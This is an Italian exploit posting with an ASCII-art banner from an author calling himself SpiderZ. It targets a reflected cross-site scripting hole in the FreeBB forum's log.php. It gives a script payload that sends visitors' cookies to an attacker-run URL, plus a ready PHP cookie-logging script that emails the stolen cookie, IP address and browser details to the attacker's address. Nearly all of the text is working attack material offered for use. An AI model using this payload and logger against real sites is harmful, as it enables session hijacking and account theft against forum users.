/ \
\ \ ,, / /
'-.`\()/`.-'
.--_'( )'_--.
/ /` /`""`\ `\ \ * SpiderZ ForumZ Security *
| | >< | |
\ \ / /
'.__.'
• Xss Freebb ( All Version )
• Author: SpiderZ
• Sito: http://www.spiderz.altervista.org
• Sito2: https://www.spiderz.netsons.org
Xss freebb
Sito ufficiale frebb http://www.free-bb.com/fr/
Url : www.sitoweb.com/forum/log.php?log=avatar&sid=1&a=ma
XSS
nrw&la=">><script>document.location.replace('http://WWW.SITOWEB/FILE.php?c='+document.cookie);</script>
Url + xss : www.sitoweb.com/forum/log.php?log=avatar&sid=1&a=ma?nrw&la=">><script>document.location.replace('http://WWW.SITOWEB.COM/FILE.php?c='+document.cookie);</script>
Log cookie ( Exploit.php )
<?php
$ip = $_SERVER['REMOTE_ADDR'];
$userAgent = $_SERVER['HTTP_USER_AGENT'];
$accept=$_SERVER['HTTP_ACCEPT_LANGUAGE'];
$cookie = $_GET['c'];
$myemail = "LA TUA E-MAIL";
$today = date("l, F j, Y, g:i a") ;
$subject = "Xss fre-bb" ;
$message = "Xss free-bb
Ip: $ip
Cookie: $cookie
Browser: $userAgent
Lingua: $accept
Url: $base
Giorno & Ora : $today \n
";
$from = "From: $myemail\r\n";
mail($myemail, $subject, $message, $from);
?>
Modifica : $myemail = "LA TUA E-MAIL";